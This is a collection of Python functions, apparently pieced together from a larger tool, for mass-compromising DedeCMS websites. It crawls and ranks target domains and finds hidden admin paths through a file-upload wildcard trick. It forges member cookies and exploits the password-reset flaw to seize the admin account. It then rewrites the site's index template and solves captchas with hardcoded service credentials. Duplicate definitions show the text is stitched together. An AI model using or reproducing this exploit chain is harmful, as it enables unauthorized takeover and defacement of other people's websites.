def edit_templates(self, ):
global content
try:
res = self._login_admin()
if not res:
return {
"domain": self.domain,
"res": False,
"info": "后台登录失败:%s" % self.user
}
else:
print('后台登录成功')
acdir_url = "%s/templets_main.php" % self.back_ground_url
a = utils.my_requests(method="get",
url=acdir_url,
requester=self.session)
try:
acdir = re.findall(r"(?<=action=upload&acdir=)\S+(?='>)",
a.text)[0]
except Exception as e:
acdir = "admin"
eidt_url = self.back_ground_url + '/tpl.php?action=edit&acdir=%s&filename=index.htm' % acdir
edit_content = utils.my_requests(method="get",
url=eidt_url,
requester=self.session)
edit_content.encoding = edit_content.apparent_encoding
try:
content = re.findall(
r'(<textarea id="content" .*?>([\s\S]*?)</textarea>)',
edit_content.text)[0][1]
# 处理content内容
content = content.encode(self.charset)
except Exception as e:
print(e)
post_form = {
"action": "saveedit",
"acdir": acdir,
"filename": 'index.htm',
"content": content
}
self.heders[
'Content-Type'] = 'application/x-www-form-urlencoded,charset=%s' % self.charset
res = utils.my_requests(method="post",
url=self.back_ground_url + "/tpl.php",
headers=self.heders,
data=post_form,
allow_redirects=True,
timeout=120,
requester=self.session)
if "成功修改" in res.text:
return {
"domain": self.domain,
"res": True,
"info": "success"
}
except Exception as e:
print(e)
def _login_admin(self, try_count=3):
# global hash_v, hash_k, rhash_k, rhash_v
try:
login_url = "%s/login.php" % self.back_ground_url
login_form = {
"dopost": "login",
"adminstyle": "newdedecms",
"validate": "",
"gotopage": self.back_ground_url + "/index.php",
"userid": self.user,
"pwd": self.pwd
}
res = utils.my_requests(login_url,
timeout=60,
requester=self.session)
try:
self.charset = res.apparent_encoding
except Exception as e:
print("%s:编码识别错误" % self.domain)
# if "vdimgck" in re.sub("(?=<!--)[\s\S]+(?<=-->)","",res.text):
if 1 == 1:
res = utils.my_requests(self.domain + self.vcode_url,
timeout=10,
requester=self.session)
img_path = "./vcode/%d.jpg" % int(time.time())
with open(file=img_path, mode="wb") as fp:
fp.write(res.content)
img = Image.open(img_path)
vcode_v = utils.base64_api(uname='danche',
pwd='qq199605',
img=img)
if "余额不足" in vcode_v:
return False
login_form.update({"validate": vcode_v})
res = utils.my_requests(method="post",
url=login_url,
data=login_form,
allow_redirects=True,
timeout=120,
requester=self.session)
if "验证码不正确" in res.text:
return False
return True
except Exception as e:
traceback.print_exc()
if try_count > 0:
return self._login_admin(try_count - 1)
else:
return False
def get_admin_cookie(self):
res = self._login_member()
if not res:
return {
"domain": self.domain,
"res": False,
"info": "会员页登录失败:%s" % self.user
}
try:
res = utils.my_requests(method="get",
url="%s/member/index.php?uid=0000001" %
self.domain,
requester=self.session)
cookie = requests.utils.dict_from_cookiejar(self.session.cookies)
# if "last_vid__ckMd5" not in cookie.keys():
# return {"domain": self.domain, "res": False, "info": "空间未开放"}
cookie.update({
"DedeUserID": "0000001",
"DedeUserID__ckMd5": cookie["last_vid__ckMd5"]
})
return {"domain": self.domain, "res": True, "info": cookie}
except Exception as e:
return {
"domain": self.domain,
"res": False,
"info": "获取前台cookie失败(空间未开放)"
}
def post_data(session, domain, vcode, uname="0000001", dopost="regbase"):
try:
params = {
"dopost": dopost,
"step": 1,
"mtype": "个人",
"mtype": "个人",
"userid": uname,
"uname": "0000001c",
"userpwd": "qwe123",
"userpwdok": "qwe123",
"email": "*****@*****.**",
"safequestion": 0,
"safeanswer": "",
"sex": "",
"agree": ""
}
params.update({"vdcode": vcode})
res = utils.my_requests(url=domain + "/member/reg_new.php",
params=params,
timeout=10,
requester=session)
return res
except Exception as e:
traceback.print_exc()
return False
def select_weight(domain):
weight = 0
try:
aizhan_api = "https://apistore.aizhan.com/baidurank/siteinfos/%s?domains=%s" % (
my_key, domain.replace("https://", "").replace("http://", ""))
res = utils.my_requests(aizhan_api)
data = json.loads(res.text)["data"]["success"]
weight = data[0]["pc_br"]
except Exception as e:
traceback.print_exc()
return weight
def _login_admin(self, try_count=3):
# global hash_v, hash_k, rhash_k, rhash_v
try:
login_url = "%s/login.php" % self.back_ground_url
login_form = {
"dopost": "login",
"adminstyle": "newdedecms",
"userid": self.user,
"pwd": self.pwd
}
utils.my_requests(login_url, timeout=60, requester=self.session)
utils.my_requests(method="post",
url=login_url,
data=login_form,
allow_redirects=True,
timeout=120,
requester=self.session)
return True
except Exception as e:
traceback.print_exc()
if try_count - 1 > 0:
return self._login_admin(try_count - 1)
else:
return False
def try_common(domain):
back_dir_dict = []
s = domain.replace("http://", "").replace("https://", "")
n = len(s.split("."))
if n == 2:
path = s.split(".")[0]
back_dir_dict = [
path,
"admin_%s" % path,
"dede_%s" % path,
"ad_%s" % path,
"bk_%s" % path,
"background_%s" % path,
"houtai_%s" % path,
"%s_admin" % path,
"%s_dede" % path,
"%s_ad" % path,
"%s_bk" % path,
"%s_background" % path,
"%s_houtai" % path
]
if n >= 3:
for path in s.split(".")[:n - 1]:
back_dir_dict = [
path,
"admin_%s" % path,
"dede_%s" % path,
"ad_%s" % path,
"bk_%s" % path,
"background_%s" % path,
"houtai_%s" % path,
"%s_admin" % path,
"%s_dede" % path,
"%s_ad" % path,
"%s_bk" % path,
"%s_background" % path,
"%s_houtai" % path
]
back_dir_dict.extend(base_back_dict)
for back_dir in back_dir_dict:
print(domain + "/" + back_dir + "/login.php")
res = utils.my_requests(domain + "/" + back_dir + "/login.php",
try_count=2)
if res and res.status_code == 200 and "login.php" in res.url:
res = {"domain": domain, "res": True, "info": back_dir}
ress.append(res)
return res
pass
def crawling(i):
while True:
try:
#title_words = ['银行', '政府', '管理', '内容', '系统']
path = './dict/采集标题过滤字典.txt'
title_words = utils.get_lines(path)
domain_model = dbsqlite.data_getlist(' is_crawl = 0 limit 1')[0]
if not domain_model:
print('线程:%d未查到采集源,等待3s' % i)
time.sleep(3)
continue
url = domain_model[1]
print('线程%d:%s' % (i, url))
response = my_requests(url)
if response:
response.encoding = response.apparent_encoding
response2_txt = response.text
title = re.findall('<title>(.+)</title>', response2_txt)[0]
if any(each in title for each in title_words):
dbsqlite.data_update(url,
"title = '%s',status = 1" % title)
continue
else:
dbsqlite.data_update(url, "title = '%s'" % title)
urllist = getUrllist(response.text, url)
print('%s友链数:%d' % (url, len(urllist)))
for curl in urllist:
# s = urllib.parse.urlparse(url).netloc
try:
res = utils.my_requests(url=curl,
try_count=1,
timeout=10)
if res:
curl = utils.format_domain(res.url, protocol=True)
else:
continue
except Exception as e:
continue
if dbsqlite.data_select(curl):
continue
dbsqlite.data_insert(curl)
else:
dbsqlite.data_update(url, 'status = 1')
except Exception as e:
print(e)
continue
def bash_select_weight():
domains = list(utils.get_lines("查权重"))
ress = {}
domains_g = utils.group_by_list(domains, 50)
for domains in domains_g:
try:
aizhan_api = "https://apistore.aizhan.com/baidurank/siteinfos/%s?domains=%s"
res = utils.my_requests(
aizhan_api % (my_key, "|".join(domains).replace(
"https://", "").replace("http://", "")))
for data in json.loads(res.text)["data"]["success"]:
ress.update({data["domain"]: data["pc_br"]})
except Exception as e:
traceback.print_exc()
ress = sorted(ress.items(), key=lambda d: d[1], reverse=True)
with open(file="./res/权重", mode="a") as fp:
for res in ress:
fp.write("\nd%s|%s" % (res[0], res[1]))
def multi_try_common(domains):
ress = []
custom_base_bg = [
"%s", "admin_%s", "dede_%s", "ad_%s", "bk_%s", "background_%s",
"houtai_%s", "%s_admin", "%s_dede", "%s_ad", "%s_bk", "%s_background",
"%s_houtai"
]
ns = len(custom_base_bg)
custom_base_bg.extend(base_back_dict)
for n in range(len(custom_base_bg)):
back_dir = custom_base_bg[n]
for data in domains[:]:
try:
domain = utils.format_domain(data[1], protocol=True)
if n < ns:
domain_middle = tldextract.extract(domain).domain
bg = back_dir % domain_middle
else:
bg = back_dir
print(domain + "/" + bg + "/login.php")
res = utils.my_requests(url=domain + "/" + bg + "/login.php",
try_count=1,
show_log=False)
if not res or res.status_code != 200 or "login.php" not in res.url:
continue
res = {"domain": data[1], "res": True, "info": bg}
ress.append(res)
domains.remove(data)
except ConnectionError as e:
print(e)
except requests.exceptions.ReadTimeout as e:
print(e)
except TimeoutError as e:
print(e)
except Exception as e:
traceback.print_exc()
return ress
def start(self):
res = self.get_admin_cookie()
if not res["res"]:
return res
params = {
"dopost": "safequestion",
"safequestion": "0.0",
"safeanswer": "",
"id": 1
}
cookie_str = str(res["info"]).replace("'", "").replace(
"{", "").replace("}", "").replace(": ", "=").replace(", ", "; ")
headers = {"Cookie": cookie_str}
try:
reset_pwd_url = "%s/member/resetpassword.php" % self.domain
res = requests.post(url=reset_pwd_url,
params=params,
headers=headers)
pwd_url = re.findall("(?<=href=').*(?='>)",
res.text)[0].replace('amp;', "")
# pwd_url = re.sub("(http://).*(?=http)", "", pwd_url)
# res = self.session.get(pwd_url)
key = re.findall("(?<=key=).*", pwd_url)[0]
login_form = {
"dopost": "getpasswd",
"userid": "admin",
"setp": "2",
"id": "1",
"pwd": self.pwd,
"pwdok": self.pwd,
"key": key
}
res = utils.my_requests(method="post",
url=reset_pwd_url,
data=login_form,
allow_redirects=True,
timeout=120,
requester=self.session)
if "密码成功" not in res.text:
res = utils.my_requests(method="post",
url=reset_pwd_url,
params=login_form,
allow_redirects=True,
timeout=120,
requester=self.session)
if "密码成功" not in res.text:
return {
"domain": self.domain,
"res": False,
"info": "更新前台admin密码失败"
}
except Exception as e:
traceback.print_exc()
return {
"domain": self.domain,
"res": False,
"info": "更新前台admin密码失败"
}
try:
# self.user = "******"
# self.session = requests.session()
res = self.get_admin_cookie()
self.session = requests.session()
for k, v in res["info"].items():
self.session.cookies[k] = v
if not res:
print("第二次获取admin cookie失败,异常")
return res
except:
if not res:
return {
"domain": self.domain,
"res": False,
"info": "更新后台admin密码失败"
}
res = self.reset_back_admin()
return res
def _login_member(self, try_count=3):
try:
login_url = "%s/member" % self.domain
login_form = {
"dopost": "login",
"fmdo": "login",
"userid": self.user,
"pwd": self.pwd,
"vdcode": "",
"gourl": "/",
"keeptime": "604800"
}
res = utils.my_requests(login_url,
timeout=60,
requester=self.session)
try:
self.charset = res.apparent_encoding
except Exception as e:
print("%s:编码识别错误" % self.domain)
# if "vdimgck" in re.sub("(?=<!--)[\s\S]+(?<=-->)","",res.text):
if 1 == 1:
res = utils.my_requests(self.domain + self.vcode_url,
timeout=10,
requester=self.session)
img_path = "./vcode/%d.jpg" % int(time.time())
with open(file=img_path, mode="wb") as fp:
fp.write(res.content)
img = Image.open(img_path)
vcode_v = utils.base64_api(uname='danche',
pwd='qq199605',
img=img)
login_form.update({"vdcode": vcode_v})
res = utils.my_requests(method="post",
url=login_url + "/index_do.php",
headers=self.heders,
data=login_form,
allow_redirects=True,
timeout=120,
requester=self.session)
if "DedeUserID" in requests.utils.dict_from_cookiejar(
self.session.cookies).keys():
return True
else:
res = utils.my_requests(method="post",
url=login_url + "/index_do.php",
headers=self.heders,
params=login_form,
allow_redirects=True,
timeout=120,
requester=self.session)
if "DedeUserID" in requests.utils.dict_from_cookiejar(
self.session.cookies).keys():
return True
if try_count > 0:
return self._login_member(try_count - 1)
except Exception as e:
traceback.print_exc()
if try_count > 0:
return self._login_member(try_count - 1)
else:
return False
def reset_back_admin(self, try_count=3):
try:
res = utils.my_requests(method="get",
url=self.domain +
"/member/edit_baseinfo.php",
requester=self.session)
try:
uname = re.findall(r'(?<=id\="uname" value\=").*?(?=")',
res.text)[0]
except Exception as e:
uname = "admin"
post_form = {
"dopost": "save",
"uname": uname,
"oldpwd": self.pwd,
"userpwd": self.pwd,
"userpwdok": self.pwd,
"safequestion": "0",
"safeanswer": "",
"newsafequestion": "0",
"newsafeanswer": "",
"sex": "男".encode(self.charset),
"email": "*****@*****.**",
"vdcode": ""
}
res = utils.my_requests(self.domain + self.vcode_url,
timeout=10,
requester=self.session)
img_path = "./vcode/%d.jpg" % int(time.time())
with open(file=img_path, mode="wb") as fp:
fp.write(res.content)
img = Image.open(img_path)
vcode_v = utils.base64_api(uname='danche', pwd='qq199605', img=img)
post_form.update({"vdcode": vcode_v})
res = utils.my_requests(method="post",
url=self.domain +
"/member/edit_baseinfo.php",
headers=self.heders,
data=post_form,
allow_redirects=True,
timeout=120,
requester=self.session)
if "成功" not in res.text:
res = utils.my_requests(method="post",
url=self.domain +
"/member/edit_baseinfo.php",
headers=self.heders,
params=post_form,
allow_redirects=True,
timeout=120,
requester=self.session)
if "成功" not in res.text:
if try_count > 0:
return self.reset_back_admin(try_count - 1)
else:
if "完成详细资料" in res.text:
return {
"domain": self.domain,
"res": False,
"info": "失败(完善详细资料)!!!"
}
return {
"domain": self.domain,
"res": False,
"info": "失败!!!"
}
return {
"domain":
"%s|%s|admin(%s)" % (self.domain, self.back_ground_url, uname),
"res":
True,
"info":
"成功!!!"
}
except Exception as e:
traceback.print_exc()
if try_count > 0:
return self.reset_back_admin(try_count - 1)
else:
return {"domain": self.domain, "res": False, "info": "失败!!!"}
def get_back_url(domain):
back_dir = ""
flag = 0
up_path = "./../{p}<</images/adminico.gif"
data = {
"_FILES[mochazz][tmp_name]": up_path,
"_FILES[mochazz][name]": 0,
"_FILES[mochazz][size]": 0,
"_FILES[mochazz][type]": "image/gif"
}
site_files = [
"/plus/diy.php", "/plus/list.php", "/plus/feedback.php",
"/plus/count.php", "/tags.php"
]
try:
for site_file_path in site_files:
url = domain + site_file_path
res = utils.my_requests(url)
if res and res.status_code == 200:
target_url = domain + site_file_path
if site_file_path == "/tags.php":
up_path = "./{p}<</images/adminico.gif"
data.update({"_FILES[mochazz][tmp_name]": up_path})
break
else:
res = {"domain": domain, "res": False, "info": "找不到上传路径"}
return res
for num in range(1, 3):
if flag:
break
for pre in itertools.permutations(characters, num):
pre = ''.join(list(pre))
# if pre == "my":
# print("1")
data["_FILES[mochazz][tmp_name]"] = data[
"_FILES[mochazz][tmp_name]"].format(p=pre)
print("testing", pre)
r = utils.my_requests(target_url, method="post", data=data)
data["_FILES[mochazz][tmp_name]"] = up_path
if "Upload filetype not allow !" not in r.text and r.status_code == 200:
flag = 1
back_dir = pre
break
if not flag:
res = {"domain": domain, "res": False, "info": "没找到"}
return res
print("[+] 前缀为:", back_dir)
flag = 0
for i in range(len(characters)):
if flag:
break
for ch in characters:
if back_dir == "aaaa":
res = {"domain": domain, "res": False, "info": "循环错误"}
return res
if ch == characters[-1]:
flag = 1
break
data["_FILES[mochazz][tmp_name]"] = data[
"_FILES[mochazz][tmp_name]"].format(p=back_dir + ch)
r = utils.my_requests(target_url, method="post", data=data)
data["_FILES[mochazz][tmp_name]"] = up_path
if "Upload filetype not allow !" not in r.text and r.status_code == 200:
back_dir += ch
print("%s[+]" % domain, back_dir)
# print("后台地址为:", domain+"/"+back_dir)
break
res = {"domain": domain, "res": True, "info": back_dir}
print("后台地址为:", domain + "/" + back_dir)
return res
except Exception as e:
traceback.print_exc()
res = {"domain": domain, "res": False, "info": "未知错误"}
return res
